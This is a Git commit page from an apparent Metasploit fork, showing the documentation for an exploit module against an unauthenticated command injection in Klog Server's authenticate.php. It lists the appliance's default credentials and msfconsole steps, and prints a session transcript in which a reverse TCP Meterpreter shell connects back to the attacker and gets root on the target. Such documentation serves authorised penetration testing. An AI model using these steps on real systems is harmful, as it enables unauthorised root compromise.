adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add Klog Server authenticate.php user Unauthenticated Command Injection

Browse Source
This commit is contained in:
Brendan Coles
2021-02-12 17:07:52 +00:00
parent f456c965ff
commit bdc2041c83
2 changed files with 289 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/klog_server_authenticate_user_unauth_command_injection.md
+130
View File
@@ -0,0 +1,130 @@
## Vulnerable Application
This module exploits an unauthenticated command injection vulnerability
in [Klog Server](https://www.klogserver.com/) versions 2.4.1 and prior.
The `authenticate.php` file uses the `user` HTTP POST parameter in a call
to the `shell_exec()` PHP function without appropriate input validation,
allowing arbitrary command execution as the apache user.
The sudo configuration permits the apache user to execute any command
as root without providing a password, resulting in privileged command
execution as root.
This module has been successfully tested on Klog Server version 2.4.1
virtual appliance.
Download:
* https://www.klogserver.com/download/ova/2.4.1/klogserver.ova
## Verification Steps
The virtual appliance makes use of a default IP address `10.10.56.51`.
To change the network settings:
1. Login as `admin` - the default console and SSH credentials are `admin` / `admin`.
1. Select menu option `Ağ ayarları` (1) to view network settings
```
=== ANA MENÜ ===========================================================
1. Ağ ayarları
2. Sorun giderme
3. Bakım
4. Cıkış
Çalıştırmak istediğiniz komutun sayısını giriniz: 1
```
1. Select menu option `Ağ ayarlarını güncelle` (2) to change the current network configuration
```
--- AĞ AYARLARI --------------------------------------------------------
1. Ağ ayarlarını göster
2. Ağ ayarlarını güncelle
3. Ana menüye dön
Çalıştırmak istediğiniz komutun sayısını giriniz: 2
```
1. Enter the desired IP address, netmask, and gateway
```
Yeni IP adresi giriniz. Menüye dönmek için Enter'a basınız:
> 10.1.1.123
IP adres: 10.1.1.123
Yeni alt ag maskesini giriniz. Menüye dönmek için Enter'a basınız:
> 255.255.255.0
IP adres: 10.1.1.123
Alt ağ maskesi: 255.255.255.0
Yeni ağ geçidini giriniz. Menüye dönmek için Enter'a basınız:
> 10.1.1.1
IP adres: 10.1.1.123
Alt ağ maskesi: 255.255.255.0
Ağ geçidi: 10.1.1.1
Ayarlar uygulanıyor...
```
Metasploit:
1. Start msfconsole
1. Do: `use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection`
1. Do: `set RHOSTS [IP]`
1. Do: `set TARGET [TARGET]`
1. Do: `set PAYLOAD [PAYLOAD]`
1. Do: `set LHOST [IP]`
1. Do: `exploit`
## Options
### TARGETURI
The base path of the Klog Server (Default: `/`)
### USE_SUDO
Execute payload as root using `sudo` (Default: `true`)
## Scenarios
### Klog Server version 2.4.1
```
msf6 > use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set rhosts 10.1.1.123
rhosts => 10.1.1.123
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > check
[+] 10.1.1.123:443 - The target is vulnerable. Response received after 9 seconds.
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set target 0
target => 0
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set lhost 10.1.1.105
lhost => 10.1.1.105
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > run
[*] Started reverse TCP handler on 10.1.1.105:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Response received after 11 seconds.
[*] Sending stage (980808 bytes) to 10.1.1.123
[*] Meterpreter session 1 opened (10.1.1.105:4444 -> 10.1.1.123:35824) at 2021-02-11 22:59:15 -0500
[*] Command Stager progress - 100.00% done (773/773 bytes)
meterpreter > getuid
Server username: root @ klogserver.klogserver.com (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : klogserver.klogserver.com
OS : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```